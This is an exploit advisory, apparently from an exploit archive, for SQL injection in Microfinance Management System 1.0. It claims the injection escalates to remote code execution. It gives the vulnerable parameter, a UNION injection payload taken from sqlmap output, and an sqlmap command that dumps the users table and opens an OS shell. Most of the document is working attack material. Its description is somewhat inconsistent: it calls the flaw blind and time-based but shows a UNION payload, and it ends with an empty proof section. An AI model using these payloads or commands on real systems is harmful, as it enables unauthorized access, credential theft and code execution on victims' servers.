Authored by Hejap Zairy

Microfinance Management System version 1.0 suffers from a remote blind SQL injection vulnerability that can be used to escalate privileges and execute code.

# Title: Microfinance Management System 1.0  SQLi To Rce
# Author: Hejap Zairy
# Date: 24.07.2022
# Vendor:
# Software:
# Reference:
# Tested on: Windows, MySQL, Apache

#vulnerability Code php

$sql = "SELECT count(*) AS total_account FROM account_type";
$result = mysqli_query($conn, $sql);
$data = mysqli_fetch_assoc($result);

GET parameter 'account_type_number' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
sqlmap identified the following injection point(s) with a total of 147 HTTP(s) requests:
Parameter: account_type_number (GET)
Type: UNION query
Title: MySQL UNION query (random number) - 3 columns
Payload: account_type_number=-6015' UNION ALL SELECT 7366,CONCAT(0x716b626b71,0x4268666c6b715274794a58534f487366546e5379414951584a684459764f424451536f5a707a6a6a,0x7170707a71),7366#

#SQLi Time to Rce

sqlmap -u '' --hex --time-sec=17 --dbms=mysql --technique=u --random-agent --eta -p account_type_number -D mims -T users --dump --os-shell

# Description:
The Blind Time SQLi vulnerability was converted to rce due to the permissions I have in the database and it was privesc

# Proof and Exploit: